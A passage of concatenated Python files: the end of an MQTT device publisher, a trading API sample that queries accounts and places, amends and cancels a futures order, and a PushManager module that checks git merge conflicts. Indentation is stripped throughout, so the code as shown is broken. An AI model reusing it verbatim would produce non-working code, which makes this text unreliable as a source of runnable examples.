self.client.publish("%s/digital/%s/config/class" % ( str(ltopic), str(data["pin"]) ), str(data["class"]))
self.client.publish("%s/digital/%s/config/state" % ( str(ltopic), str(data["pin"]) ), str(data["state"]))
def run(self):
#Start thread for message/connection handling.
self.client.loop_start()
# Here, we call the method to populate this unique arduino device's ID
#self.getFirmwareName()
# This is the counter value for the modulus statements.
bigCounter = 0
# These are modulus values for calling a separate publisher which
# queries the pin and pixel states via a call to to the GET sub-
# -command.
pixelInfoMod = 4
digitalInfoMod = 4
while True:
# This is the most common publisher statement, it shows basic
# configuration stuff and locally saved data.
self.publisher()
bigCounter += 1
#This queries all of the neopixel strands for color and pin data. (active)
if (bigCounter % pixelInfoMod) == 0:
#self.getSettings("neopixel") # This method will save the data to class and perform the publishing.
pass
#This queries the digital instance data for pin mode
if (bigCounter % digitalInfoMod) == 0:
#self.getSettings("digital")
pass
if bigCounter >= 65535: #Lets stop at a big-ish number.
bigCounter = 0
time.sleep(10)
|
trade_sample.py
|
import time
from tcoreapi_mq import *
import tcoreapi_mq
import threading
g_TradeZMQ = None
g_TradeSession = ""
ReportID=""
#已登入資金帳號變更
def OnGetAccount(account):
print(account["BrokerID"])
#實時委託回報消息
def OnexeReport(report):
global ReportID
print("OnexeReport:", report["ReportID"])
ReportID=report["ReportID"]
return None
#實時成交回報回補
def RtnFillReport(report):
print("RtnFillReport:", report["ReportID"])
#查詢當日歷史委託回報回補
def ShowEXECUTIONREPORT(ZMQ,SessionKey,reportData):
if reportData["Reply"] == "RESTOREREPORT":
Orders = reportData["Orders"]
if len(Orders) == 0:
return
last = ""
for data in Orders:
last = data
print("查詢回報",data)
reportData = g_TradeZMQ.QryReport(SessionKey,last["QryIndex"])
ShowEXECUTIONREPORT(g_TradeZMQ,SessionKey,reportData)
#查詢當日歷史委託成交回補
def ShowFillReport(ZMQ,SessionKey,reportData):
if reportData["Reply"] == "RESTOREFILLREPORT":
Orders = reportData["Orders"]
if len(Orders) == 0:
return
last = ""
for data in Orders:
last = data
print("查詢成交回報",data)
reportData = g_TradeZMQ.QryFillReport(SessionKey,last["QryIndex"])
ShowFillReport(g_TradeZMQ,SessionKey,reportData)
#查詢部位消息回補
def ShowPOSITIONS(ZMQ,SessionKey,AccountMask,positionData):
if positionData["Reply"] == "POSITIONS":
position = positionData["Positions"]
if len(position) == 0:
return
last = ""
for data in position:
last = data
print("部位:" + data["Symbol"])
positionData = g_TradeZMQ.QryPosition(SessionKey,AccountMask,last["QryIndex"])
ShowPOSITIONS(g_TradeZMQ,SessionKey,AccountMask,positionData)
#交易消息接收
def trade_sub_th(obj,sub_port,filter = ""):
socket_sub = obj.context.socket(zmq.SUB)
#socket_sub.RCVTIMEO=5000 #ZMQ超時設定
socket_sub.connect("tcp://127.0.0.1:%s" % sub_port)
socket_sub.setsockopt_string(zmq.SUBSCRIBE,filter)
while True:
message = socket_sub.recv()
if message:
message = json.loads(message[:-1])
#print("in trade message",message)
if(message["DataType"] == "ACCOUNTS"):
for i in message["Accounts"]:
OnGetAccount(i)
elif(message["DataType"] == "EXECUTIONREPORT"):
OnexeReport(message["Report"])
elif(message["DataType"] == "FILLEDREPORT"):
RtnFillReport(message["Report"])
def main():
global g_TradeZMQ
global g_TradeSession
#登入(與 TOUCHANCE zmq 連線用,不可改)
g_TradeZMQ = TradeAPI("ZMQ","8076c9867a372d2a9a814ae710c256e2")
t_data = g_TradeZMQ.Connect("51207")
print(t_data)
if t_data["Success"] != "OK":
print("[trade]connection failed")
return
g_TradeSession = t_data["SessionKey"]
#######################################################################交易##################################################
#建立一個交易線程
t1 = threading.Thread(target = trade_sub_th,args=(g_TradeZMQ,t_data["SubPort"],))
t1.start()
#查詢已登入資金帳號
accountInfo = g_TradeZMQ.QryAccount(g_TradeSession)
print("查詢已登入的資金帳號:",accountInfo)
strAccountMask=""
if accountInfo != None:
arrInfo = accountInfo["Accounts"]
if len(arrInfo) != 0:
#print("@@@@@@@@@@@:",arrInfo[0],"\n")
strAccountMask = arrInfo[0]["AccountMask"]
print(strAccountMask)
#查詢委託紀錄
reportData = g_TradeZMQ.QryReport(g_TradeSession,"")
print('查詢所有回報:',reportData)
ShowEXECUTIONREPORT(g_TradeZMQ,g_TradeSession,reportData)
fillReportData = g_TradeZMQ.QryFillReport(g_TradeSession,"")
print('查詢成交回報:', fillReportData)
ShowFillReport(g_TradeZMQ,g_TradeSession,fillReportData)
#查詢資金
if strAccountMask !="":
print("查詢資金帳號:",g_TradeZMQ.QryMargin(g_TradeSession,strAccountMask))
#查詢持倉
positionData = g_TradeZMQ.QryPosition(g_TradeSession,strAccountMask,"")
print('查詢持倉部位:',positionData)
ShowPOSITIONS(g_TradeZMQ,g_TradeSession,strAccountMask,positionData)
#下單
orders_obj = {
"Symbol":"TC.F.TWF.FITX.HOT",
"BrokerID":arrInfo[0]['BrokerID'],
"Account":arrInfo[0]['Account'],
"Price":"15000",
"TimeInForce":"1",
"Side":"1",
"OrderType":"2",
"OrderQty":"1",
"PositionEffect":"0"
}
s_order = g_TradeZMQ.NewOrder(g_TradeSession,orders_obj)
print('下單結果:',s_order)
"""
if s_order['Success']=="OK":
print("下單成功")
elif s_order['ErrCode']=="-10":
print("unknow error")
elif s_order['ErrCode']=="-11":
print("買賣別錯誤")
elif s_order['ErrCode']=="-12":
print("複式單商品代碼解析錯誤 ")
elif s_order['ErrCode']=="-13":
print("下單帳號,不可下此交易所商品")
elif s_order['ErrCode']=="-14":
print("下單錯誤,不支持的 價格 或 OrderType 或 TimeInForce")
elif s_order['ErrCode']=="-15":
print("不支援證券下單")
elif s_order['ErrCode']=="-20":
print("未建立連線")
elif s_order['ErrCode']=="-22":
print("價格的 TickSize 錯誤")
elif s_order['ErrCode']=="-23":
print("下單數量超過該商品的上下限 ")
elif s_order['ErrCode']=="-24":
print("下單數量錯誤 ")
elif s_order['ErrCode']=="-25":
print("價格不能小於和等於 0 (市價類型不會去檢查) ")
"""
#改單
reporders_obj={
"ReportID":"4094755221B",
"ReplaceExecType":"0",
"Price":"16500"
}
reorder=g_TradeZMQ.ReplaceOrder(g_TradeSession,reporders_obj)
#刪單
print("%%%%%%%%%%%%%%%%%%%%%%%%%",reorder)
canorders_obj={
"ReportID":"4094755221B",
}
canorder=g_TradeZMQ.CancelOrder(g_TradeSession,canorders_obj)
print("%%%%%%%%%%%%%%%%%%%%%%%%%",canorder)
if __name__ == '__main__':
main()
|
git.py
|
# -*- coding: utf-8 -*-
"""
Core Git Module
This module provides a GitQueue to pushmanager, into which three types of task
can be enqueued:
- Verify Branch: Check that a given branch exists
- Test Pickme Conflict: Check if a pickme conflicts with other pickmes in the
same push
- Test All Pickmes: Recheck every pickme in a push against every other pickme in
the push.
Notifications for verify failures and pickme conflicts are sent to the XMPP and
Mail queues.
"""
import functools
import logging
import os
import subprocess
import time
import urllib2
from multiprocessing import JoinableQueue
from multiprocessing import Process
from urllib import urlencode
from . import db
from .mail import MailQueue
from contextlib import contextmanager
from pushmanager.core.settings import Settings
from pushmanager.core.util import add_to_tags_str
from pushmanager.core.util import del_from_tags_str
from pushmanager.core.util import EscapedDict
from pushmanager.core.util import tags_contain
from pushmanager.core.xmppclient import XMPPQueue
from tornado.escape import xhtml_escape
@contextmanager
def git_branch_context_manager(test_branch, master_repo_path):
"""Context manager that creates / deletes a temporary git branch
:param test_branch: The name of the temporary branch to create
:param master_repo_path: The on-disk path to the master repository
"""
# Remove the testing branch if it exists
try:
GitCommand("branch", "-D", test_branch, cwd=master_repo_path).run()
except GitException:
pass
# Create a new branch tracking master
make_test_branch = GitCommand(
"checkout",
"origin/master",
"-b",
test_branch,
cwd=master_repo_path
)
make_test_branch.run()
try:
yield
except Exception, e:
raise e
finally:
# Checkout master so that we can delete the test branch
checkout_master = GitCommand(
'checkout',
'master',
cwd=master_repo_path
)
checkout_master.run()
# Delete the branch that we were working on
delete_test_branch = GitCommand(
'branch',
'-D',
test_branch,
cwd=master_repo_path
)
delete_test_branch.run()
def git_reset_to_ref(starting_ref, git_directory):
"""
Resets a git repo to the specified ref.
Called as a cleanup fn by git_merge_context_manager.
:param starting_ref: Git hash of the commit to roll back to
"""
GitCommand(
'reset',
'--hard',
starting_ref,
cwd=git_directory
).run()
GitCommand(
'submodule',
'--quiet',
'sync',
cwd=git_directory
).run()
GitCommand(
'submodule',
'--quiet',
'update',
cwd=git_directory
).run()
def _stale_submodule_check(cwd):
"""
Checks that no submodules in the git repository path specified by cwd are
out of date or too new.
If any out of date submodules are found, update them.
Once all submodules are up to date, calls _check_submodule on each
changed submodule.
:param cwd: On-disk path of the git repo to work with
"""
stale_submodules = GitCommand('submodule', 'status', cwd=cwd)
_, submodule_out, _ = stale_submodules.run()
submodule_out = submodule_out.strip()
# If nothing was returned, there are no submodules to check
if len(submodule_out) == 0:
return
submodule_lines = submodule_out.split('\n')
stale_submodules = []
for submodule_line in submodule_lines:
try:
_, path, _ = submodule_line.strip().split(' ')
if submodule_line[0] == '-' or submodule_line[0] == '+':
stale_submodules.append(path)
except ValueError:
logging.error("Failed to unpack line %s", submodule_line)
# If there are no stale submodules, nothing to do
if len(stale_submodules) == 0:
return
logging.info("Submodules touched in this branch: %s",
' '.join(stale_submodules))
old_shas = GitCommand(
'submodule', 'foreach', '--quiet',
'echo "$path\t$(git rev-parse HEAD | cut -c-7)"',
cwd=cwd
)
_, old_shas_out, _ = old_shas.run()
old_shas_out = old_shas_out.strip()
old_sha_list = old_shas_out.split('\n')
GitCommand('submodule', '--quiet', 'sync', cwd=cwd).run()
# Only fetch changed submodules
for submodule in stale_submodules:
GitCommand('submodule', 'update', '--init', submodule, cwd=cwd).run()
GitCommand('--git-dir=%s/.git' % submodule, 'fetch', cwd=cwd).run()
_check_submodule(cwd, stale_submodules, old_sha_list)
def _check_submodule(cwd, submodule_names, old_shas):
"""
Checks that submodules
- Have a master branch
- Have been pushed to their master
- if the local and remote version differ, ensure that they can be
fast-forwarded.
If any of these fail, raise a GitException with some details.
:param cwd: On-disk path of the git repo to work with
:param submodule_names: List of names (relative paths) of submodules to check
:param old_shas: List of SHAs of the current versions of the submodules
"""
for name in submodule_names:
if _check_submodule_has_a_master(cwd, name):
if not _check_submodule_head_is_in_master(cwd, name):
exn_text = (
"Submodule error: %s has not been pushed to 'master'"
% name
)
raise GitException(
exn_text,
gitret=-1,
gitout=exn_text,
giterr=exn_text
)
# Find the sha that corresponds to the outdated submodule
old_sha = None
for sha in old_shas:
if sha.startswith(name):
old_sha = sha.split('\t')[1]
if not _check_submodule_is_fast_forward(cwd, name, old_sha):
exn_text = (
"Submodule Error: %s is not a fast forward of %s"
% (name, old_sha)
)
raise GitException(
exn_text,
gitret=-1,
gitout=exn_text,
giterr=exn_text
)
def _check_submodule_is_fast_forward(cwd, submodule_name, old_sha):
submodule_path = os.path.join(cwd, submodule_name)
_, new_sha, _ = GitCommand('rev-parse', 'HEAD', cwd=submodule_path).run()
_, submodule_out, _ = GitCommand(
'rev-list', '-n1', '%s..%s'
% (new_sha.strip(), old_sha), cwd=submodule_path
).run()
if len(submodule_out.strip()) > 0:
return False
return True
def _check_submodule_has_a_master(cwd, submodule_name):
submodule_path = os.path.join(cwd, submodule_name)
_, branch_output, _ = GitCommand('branch', '-r', cwd=submodule_path).run()
if "origin/master" in branch_output:
return True
else:
return False
def _check_submodule_head_is_in_master(cwd, submodule_name):
submodule_path = os.path.join(cwd, submodule_name)
_, head_sha, _ = GitCommand('rev-parse', 'HEAD', cwd=submodule_path).run()
_, branch_output, _ = GitCommand(
'branch', '-r', '--contains', head_sha.strip(),
cwd=submodule_path
).run()
return len(branch_output.strip()) > 0
@contextmanager
def git_merge_context_manager(test_branch, master_repo_path):
"""Context manager for merging that rolls back on __exit__
:param test_branch: The name of the branch to merge onto
:param master_repo_path: The on-disk path to the master repository
"""
# Store the starting ref so that we can hard reset if need be
get_starting_ref = GitCommand(
'rev-parse',
test_branch,
cwd=master_repo_path
)
_, stdout, _ = get_starting_ref.run()
starting_ref = stdout.strip()
try:
yield
except Exception, e:
raise e
finally:
git_reset_to_ref(
starting_ref,
master_repo_path
)
class GitTaskAction(object):
VERIFY_BRANCH = 1
TEST_PICKME_CONFLICT = 2
TEST_ALL_PICKMES = 3
TEST_CONFLICTING_PICKMES = 4
class GitQueueTask(object):
"""
A task for the GitQueue to perform.
Task can be one of:
- VERIFY_BRANCH: check that a branch can be found and is not a duplicate
- TEST_PICKME_CONFLICT: check which (if any) branches also pickme'd for the
same push cause merge conflicts with this branch
- TEST_ALL_PICKMES: Takes a push id, and queues every pushme with
TEST_PICKME_CONFLICT. Used when an item is de-pickmed to ensure that
anything it might have conlficted with is unmarked
"""
def __init__(self, task_type, request_id, **kwargs):
self.task_type = task_type
self.request_id = request_id
self.kwargs = kwargs
class GitException(Exception):
"""
Exception class to be thrown in Git contexts
Has fields for git output on top of basic exception information.
:param gitret: Return code from the failing Git process
:param gitout: Stdout for the git process
:param giterr: Stderr for the git process
:param gitkwargs: Keyword arguments that were passed to the Git subprocess
"""
def __init__(self, details, gitret=None, gitout=None,
giterr=None, gitkwargs=None):
super(GitException, self).__init__(details, gitout, giterr, gitkwargs)
self.details = details
self.gitret = gitret
self.gitout = gitout
self.giterr = giterr
self.gitkwargs = gitkwargs
class GitCommand(subprocess.Popen):
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
_args = ['git'] + list(args)
_kwargs = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
}
_kwargs.update(kwargs)
subprocess.Popen.__init__(self, _args, **_kwargs)
def run(self):
stdout, stderr = self.communicate()
if Settings['main_app']['debug']:
logging.error("%r, %r, %r", self.args, stdout, stderr)
if self.returncode:
raise GitException(
"GitException: git %s " % ' '.join(self.args),
gitret=self.returncode,
giterr=stderr,
gitout=stdout,
gitkwargs=self.kwargs
)
return self.returncode, stdout, stderr
class GitQueue(object):
conflict_queue = None
sha_queue = None
conflict_worker_process = None
sha_worker_process = None
shas_in_master = {}
EXCLUDE_FROM_GIT_VERIFICATION = Settings['git']['exclude_from_verification']
@classmethod
def request_is_excluded_from_git_verification(cls, request):
"""Some tags modify the workflow and are excluded from repository
verification.
"""
return tags_contain(request['tags'], cls.EXCLUDE_FROM_GIT_VERIFICATION)
@classmethod
def start_worker(cls):
worker_pids = []
if cls.conflict_worker_process is not None and cls.sha_worker_process is not None:
return worker_pids
cls.conflict_queue = JoinableQueue()
cls.sha_queue = JoinableQueue()
cls.conflict_workers = []
for worker_id in range(Settings['git']['conflict-threads']):
processing_func = functools.partial(
cls.process_conflict_queue,
worker_id
)
worker_thread = Process(target=processing_func, name='git-conflict-queue')
worker_thread.daemon = True
worker_thread.start()
cls.conflict_workers.append(worker_thread)
worker_pids.append(worker_thread.pid)
cls.sha_worker_process = Process(target=cls.process_sha_queue, name='git-sha-queue')
cls.sha_worker_process.daemon = True
cls.sha_worker_process.start()
worker_pids.append(cls.sha_worker_process.pid)
return worker_pids
@classmethod
def git_merge_pickme(cls, worker_id, pickme_request, master_repo_path):
"""Merges the branch specified by a pickme onto the current branch
:param pickme_request: Dictionary representing the pickme to merge
:param master_repo_path: On-disk path of the git repo to work in
"""
# Ensure that the branch we are merging is present
cls.create_or_update_local_repo(
worker_id,
pickme_request['repo'],
pickme_request['branch'],
checkout=False
)
# Locate and merge the branch we are testing
summary = "{branch_title}\n\n(Merged from {repo}/{branch})".format(
branch_title=pickme_request['title'],
repo=pickme_request['repo'],
branch=pickme_request['branch']
)
pull_command = GitCommand(
"pull",
"--no-ff",
"--no-commit",
pickme_request['repo'],
pickme_request['branch'],
cwd=master_repo_path)
pull_command.run()
commit_command = GitCommand(
"commit", "-m", summary,
"--no-verify", cwd=master_repo_path
)
commit_command.run()
# Verify that submodules are OK
_stale_submodule_check(master_repo_path)
@classmethod
def create_or_update_local_repo(cls, worker_id, repo_name, branch, checkout=True, fetch=False):
"""Clones the main repository if it does not exist.
If repo_name is not the main repo, add that repo as a remote and fetch
refs before checking out the specified branch.
"""
# Since we are keeping everything in the same repo, repo_path should
# always be the same
repo_path = cls._get_local_repository_uri(
Settings['git']['main_repository'],
worker_id
)
# repo_name is the remote to use. If we are dealing with the main
# repository, set the remote to origin.
if repo_name is Settings['git']['main_repository']:
repo_name = 'origin'
# Check if the main repo does not exist and needs to be created
if not os.path.isdir(repo_path):
# If we are using a reference mirror, add --reference [path] to
# the list of gitcommand args
clone_args = ['clone', cls._get_repository_uri(
Settings['git']['main_repository']
)]
if Settings['git']['use_local_mirror']:
if os.path.isdir(Settings['git']['local_mirror']):
clone_args.extend([
'--reference',
Settings['git']['local_mirror']
])
clone_args.append(repo_path)
# Clone the main repo into repo_path. Will take time!
clone_repo = GitCommand(*clone_args)
clone_repo.run()
if fetch:
# If we are dealing with a dev repo, make sure it is added as a remote
dev_repo_uri = cls._get_repository_uri(repo_name)
add_remote = GitCommand(
'remote', 'add', repo_name, dev_repo_uri,
cwd=repo_path
)
try:
add_remote.run()
except GitException, e:
# If the remote already exists, git will return err 128
if e.gitret is 128:
pass
else:
raise e
# Fetch the specified branch from the repo
remote_path = '+refs/heads/{branch}:refs/remotes/{repo}/{branch}'.format(
branch=branch,
repo=repo_name
)
fetch_updates = GitCommand(
'fetch',
'--prune',
repo_name,
remote_path,
cwd=repo_path
)
fetch_updates.run()
if checkout:
# Reset hard head, to ensure that we are able to checkout
GitCommand('reset', '--hard', 'HEAD', cwd=repo_path).run()
# Remove untracked files and directories
GitCommand('clean', '-fdfx', cwd=repo_path).run()
# Checkout the branch
full_branch = "%s/%s" % (repo_name, branch)
checkout_branch = GitCommand('checkout', full_branch, cwd=repo_path)
checkout_branch.run()
# Update submodules
sync_submodule = GitCommand(
"submodule", "--quiet", "sync",
cwd=repo_path
)
sync_submodule.run()
update_submodules = GitCommand(
"submodule", "--quiet", "update", "--init",
cwd=repo_path
)
update_submodules.run()
@classmethod
def _get_local_repository_uri(cls, repository, worker_id):
worker_repo = "{0}.{1}".format(repository, worker_id)
return os.path.join(Settings['git']['local_repo_path'], worker_repo)
@classmethod
def _get_repository_uri(cls, repository):
scheme = Settings['git']['scheme']
netloc = Settings['git']['servername']
if Settings['git']['auth']:
netloc = '%s@%s' % (Settings['git']['auth'], netloc)
if Settings['git']['port']:
netloc = '%s:%s' % (netloc, Settings['git']['port'])
if repository == Settings['git']['main_repository'] or repository == 'origin':
repository = (
'%s://%s/%s'
% (scheme, netloc, Settings['git']['main_repository'])
)
else:
repository = (
'%s://%s/%s/%s' % (
scheme, netloc,
Settings['git']['dev_repositories_dir'],
repository
)
)
return repository
@classmethod
def _get_branch_sha_from_repo(cls, req):
user_to_notify = req['user']
query_details = {
'user': req['user'],
'title': req['title'],
'repo': req['repo'],
'branch': req['branch'],
}
stdout = ""
try:
ls_remote = GitCommand(
'ls-remote', '-h',
cls._get_repository_uri(req['repo']), req['branch']
)
_, stdout, _ = ls_remote.run()
stdout = stdout.strip()
except GitException, e:
msg = """
<p>
There was an error verifying your push request in Git:
</p>
<p>
<strong>%(user)s - %(title)s</strong><br />
<em>%(repo)s/%(branch)s</em>
</p>
<p>
Attempting to query the specified repository failed with
the following error(s):
</p>
<pre>
%(stderr)s
</pre>
<p>
Regards,<br/>
PushManager
</p>
"""
query_details['stderr'] = e.giterr
msg %= EscapedDict(query_details)
subject = '[push error] %s - %s' % (req['user'], req['title'])
MailQueue.enqueue_user_email([user_to_notify], msg, subject)
return None
# successful ls-remote, build up the refs list
tokens = (tok for tok in stdout.split())
refs = zip(tokens, tokens)
for sha, ref in refs:
if ref == ('refs/heads/%s' % req['branch']):
return sha
msg = (
"""
<p>
There was an error verifying your push request in Git:
</p>
<p>
<strong>%(user)s - %(title)s</strong><br />
<em>%(repo)s/%(branch)s</em>
</p>
<p>
The specified branch (%(branch)s) was not found in the
repository.
</p>
<p>
Regards,<br/>
PushManager
</p>
""")
msg %= EscapedDict(query_details)
subject = '[push error] %s - %s' % (req['user'], req['title'])
MailQueue.enqueue_user_email([user_to_notify], msg, subject)
return None
@classmethod
def _get_request(cls, request_id):
result = [None]
def on_db_return(success, db_results):
assert success, "Database error."
result[0] = db_results.first()
request_info_query = db.push_requests.select().where(
db.push_requests.c.id == request_id
)
db.execute_cb(request_info_query, on_db_return)
req = result[0]
if req:
req = dict(req.items())
return req
@classmethod
def _get_request_ids_in_push(cls, push_id):
"""Return a list of IDs corresponding with the push requests
that have been pickmed for the push specified by push_id
:param push_id: Integer id of the push to get pickmes for
:return pickme_ids: List of pickme IDs from the database
"""
pickme_list = []
def on_db_return(success, db_results):
assert success, "Database error."
for (request, _) in db_results:
pickme_list.append(str(request))
request_info_query = db.push_pushcontents.select().where(
db.push_pushcontents.c.push == int(push_id)
)
db.execute_cb(request_info_query, on_db_return)
return pickme_list
@classmethod
def _get_push_for_request(cls, request_id):
"""Given the ID of a push request, find the push for which this
request has been pickmed.
"""
result = [None]
def on_db_return(success, db_results):
assert success, "Database error."
result[0] = db_results.first()
request_info_query = db.push_pushcontents.select().where(
db.push_pushcontents.c.request == request_id
)
db.execute_cb(request_info_query, on_db_return)
req = result[0]
if req:
req = dict(req.items())
return req
@classmethod
def _get_request_with_sha(cls, sha):
result = [None]
def on_db_return(success, db_results):
assert success, "Database error."
result[0] = db_results.first()
request_info_query = db.push_requests.select().where(
db.push_requests.c.revision == sha
)
db.execute_cb(request_info_query, on_db_return)
req = result[0]
if req:
req = dict(req.items())
return req
@classmethod
def _update_request(cls, req, updated_values):
result = [None]
def on_db_return(success, db_results):
result[0] = db_results[1].first()
assert success, "Database error."
update_query = db.push_requests.update().where(
db.push_requests.c.id == req['id']
).values(updated_values)
select_query = db.push_requests.select().where(
db.push_requests.c.id == req['id']
)
db.execute_transaction_cb([update_query, select_query], on_db_return)
updated_request = result[0]
if updated_request:
updated_request = dict(updated_request.items())
if not updated_request:
logging.error(
"Git-queue worker failed to update the request (id %s).",
req['id']
)
logging.error(
"Updated Request values were: %s",
repr(updated_values)
)
return updated_request
@classmethod
def _sha_exists_in_master(cls, worker_id, sha):
"""Check if a given SHA is included in master
Memoize shas that are, so that we can avoid expensive rev-lists later.
We can't cache shas that are not in master, since we won't know when they get merged.
"""
# Dirty cache expiry mechanism, but better than constantly
# accumulating SHAs in memory
if len(cls.shas_in_master) > 1000:
cls.shas_in_master = {}
if sha in cls.shas_in_master:
return True
repo_path = cls._get_local_repository_uri(
Settings['git']['main_repository'],
worker_id
)
try:
_, merge_base, _ = GitCommand('merge-base', 'origin/master', sha, cwd=repo_path).run()
except GitException:
# If the hash is entirely unknown, Git will throw an error
# fatal: Not a valid commit name <sha>.
return False
merge_base = merge_base.strip()
if sha == merge_base:
cls.shas_in_master[sha] = True
return True
else:
return False
@classmethod
def _test_pickme_conflict_pickme(cls, worker_id, req, target_branch,
repo_path, pushmanager_url, requeue):
"""Test for any pickmes that are broken by pickme'd request req
Precondition: We should already be on a test branch, and the pickme to
be tested against should already be successfully merged.
:param req: Details for pickme to test against
:param target_branch: Name of branch onto which to attempt merge
:param repo_path: On-disk path to local repository
:param requeue: Boolean whether or not to requeue pickmes that are conflicted with
"""
push = cls._get_push_for_request(req['id'])
if push is None:
logging.warn(
"Couldn't test pickme %d - couldn't find corresponding push",
req['id']
)
return False, None
pickme_ids = cls._get_request_ids_in_push(push['push'])
pickme_ids = [p for p in pickme_ids if int(p) != int(req['id'])]
conflict_pickmes = []
# For each pickme, check if merging it on top throws an exception.
# If it does, keep track of the pickme in conflict_pickmes
for pickme in pickme_ids:
pickme_details = cls._get_request(pickme)
if not pickme_details:
logging.error(
"Tried to test for conflicts against invalid request id %s",
pickme
)
continue
if 'state' not in pickme_details or pickme_details['state'] not in ('pickme', 'added'):
continue
# Ensure we have a copy of the pickme we are comparing against
cls.create_or_update_local_repo(
worker_id,
pickme_details['repo'],
branch=pickme_details['branch'],
fetch=True,
checkout=False
)
# Don't check against pickmes that are already in master, as
# it would throw 'nothing to commit' errors
sha = cls._get_branch_sha_from_repo(pickme_details)
if sha is None or cls._sha_exists_in_master(worker_id, sha):
continue
# If the pickme has no '*conflict*' tags, it has not been checked and
# it may conflict with master, which here would cause a pickme
# conflict. Skip it, as it should be queued to be checked, and will
# get tested against us later.
if "conflict" not in pickme_details['tags']:
continue
# Don't bother trying to compare against pickmes that
# break master, as they will conflict by default
if "conflict-master" in pickme_details['tags']:
continue
try:
with git_merge_context_manager(target_branch,
repo_path):
cls.git_merge_pickme(worker_id, pickme_details, repo_path)
except GitException, e:
if req['state'] == 'added' and pickme_details['state'] == 'pickme':
pass
else:
conflict_pickmes.append((pickme, e.gitout, e.giterr))
# Requeue the conflicting pickme so that it also picks up the
# conflict. Pass on that it was requeued automatically and to
# NOT requeue things in that run, otherwise two tickets will
# requeue each other forever.
if requeue and pickme_details['state'] != 'added':
GitQueue.enqueue_request(
GitTaskAction.TEST_PICKME_CONFLICT,
pickme,
pushmanager_url=pushmanager_url,
requeue=False
)
# If there were no conflicts, don't update the request
if not conflict_pickmes:
return False, None
updated_tags = add_to_tags_str(req['tags'], 'conflict-pickme')
updated_tags = del_from_tags_str(updated_tags, 'no-conflicts')
formatted_conflicts = ""
for broken_pickme, git_out, git_err in conflict_pickmes:
pickme_details = cls._get_request(broken_pickme)
formatted_pickme_err = (
"""<strong>Conflict with <a href=\"/request?id={pickme_id}\">
{pickme_name}</a>: </strong><br/>{pickme_out}<br/>{pickme_err}
<br/><br/>"""
).format(
pickme_id=broken_pickme,
pickme_err=xhtml_escape(git_err),
pickme_out=xhtml_escape(git_out),
pickme_name=xhtml_escape(pickme_details['title'])
)
formatted_conflicts += formatted_pickme_err
updated_values = {
'tags': updated_tags,
'conflicts': formatted_conflicts
}
updated_request = cls._update_request(req, updated_values)
if not updated_request:
raise Exception("Failed to update pickme details")
else:
return True, updated_request
@classmethod
def _clear_pickme_conflict_details(cls, req):
"""Strips the conflict-pickme, conflict-master and no-conflicts tags from a
pickme, and clears the detailed conflict field.
:param req: Details of pickme request to clear conflict details of
"""
updated_tags = del_from_tags_str(req['tags'], 'conflict-master')
updated_tags = del_from_tags_str(updated_tags, 'conflict-pickme')
updated_tags = del_from_tags_str(updated_tags, 'no-conflicts')
updated_values = {
'tags': updated_tags,
'conflicts': ''
}
updated_request = cls._update_request(req, updated_values)
if not updated_request:
raise Exception("Failed to update pickme")
@classmethod
def _test_pickme_conflict_master(
cls, worker_id, req, target_branch,
repo_path, pushmanager_url, requeue):
"""Test whether the pickme given by req can be successfully merged onto
master.
If the pickme was merged successfully, it calls
_test_pickme_conflict_pickme to check the pickme against others in the
same push.
:param req: Details of pickme request to test
:param target_branch: The name of the test branch to use for testing
:param repo_path: The location of the repository we are working in
"""
# Ensure we have a copy of the pickme branch
cls.create_or_update_local_repo(
worker_id,
req['repo'],
branch=req['branch'],
fetch=True,
checkout=False
)
# Create a test branch following master
with git_branch_context_manager(target_branch, repo_path):
# Merge the pickme we are testing onto the test branch
# If this fails, that means pickme conflicts with master
try:
with git_merge_context_manager(target_branch, repo_path):
# Try to merge the pickme onto master
cls.git_merge_pickme(worker_id, req, repo_path)
# Check for conflicts with other pickmes
return cls._test_pickme_conflict_pickme(
worker_id,
req,
target_branch,
repo_path,
pushmanager_url,
requeue
)
except GitException, e:
updated_tags = add_to_tags_str(req['tags'], 'conflict-master')
updated_tags = del_from_tags_str(updated_tags, 'no-conflicts')
conflict_details = "<strong>Conflict with master:</strong><br/> %s <br/> %s" % (e.gitout, e.giterr)
updated_values = {
'tags': updated_tags,
'conflicts': conflict_details
}
updated_request = cls._update_request(req, updated_values)
if not updated_request:
raise Exception("Failed to update pickme")
else:
return True, updated_request
@classmethod
def test_pickme_conflicts(
cls,
worker_id,
request_id,
pushmanager_url,
requeue=True):
"""
Tests for conflicts between a pickme and both master and other pickmes
in the same push.
:param request_id: ID number of the pickme to be tested
:param requeue: Whether or not pickmes that this pickme conflicts with
should be added back into the GitQueue as a test conflict task.
"""
req = cls._get_request(request_id)
if not req:
logging.error(
"Tried to test conflicts for invalid request id %s",
request_id
)
return
if 'state' not in req or req['state'] not in ('pickme', 'added'):
return
push = cls._get_push_for_request(request_id)
if not push:
logging.error(
"Request %s (%s) doesn't seem to be part of a push",
request_id,
req['title']
)
return
push_id = push['push']
#### Set up the environment as though we are preparing a deploy push
## Create a branch pickme_test_PUSHID_PICKMEID
# Ensure that the local copy of master is up-to-date
cls.create_or_update_local_repo(
worker_id,
Settings['git']['main_repository'],
branch="master",
fetch=True
)
# Get base paths and names for the relevant repos
repo_path = cls._get_local_repository_uri(
Settings['git']['main_repository'],
worker_id
)
target_branch = "pickme_test_{push_id}_{pickme_id}".format(
push_id=push_id,
pickme_id=request_id
)
# Check that the branch is still reachable
sha = cls._get_branch_sha_from_repo(req)
if sha is None:
return
# Check if the pickme has already been merged into master
if cls._sha_exists_in_master(worker_id, sha):
return
# Clear the pickme's conflict info
cls._clear_pickme_conflict_details(req)
# Check for conflicts with master
conflict, updated_pickme = cls._test_pickme_conflict_master(
worker_id,
req,
target_branch,
repo_path,
pushmanager_url,
requeue
)
if conflict:
if updated_pickme is None:
raise Exception(
"Encountered merge conflict but was not passed details"
)
cls.pickme_conflict_detected(updated_pickme, requeue, pushmanager_url)
else:
# If the request does not conflict here or anywhere else, mark it as
# no-conflicts
req = cls._get_request(request_id)
if 'conflict' in req['tags']:
return
updated_tags = add_to_tags_str(req['tags'], 'no-conflicts')
updated_values = {
'tags': updated_tags,
}
updated_request = cls._update_request(req, updated_values)
if not updated_request:
raise Exception("Failed to update pickme")
@classmethod
def pickme_conflict_detected(cls, updated_request, send_notifications, pushmanager_url):
msg = (
"""
<p>
PushManager has detected that your pickme contains conflicts with %(conflicts_with)s.
</p>
<p>
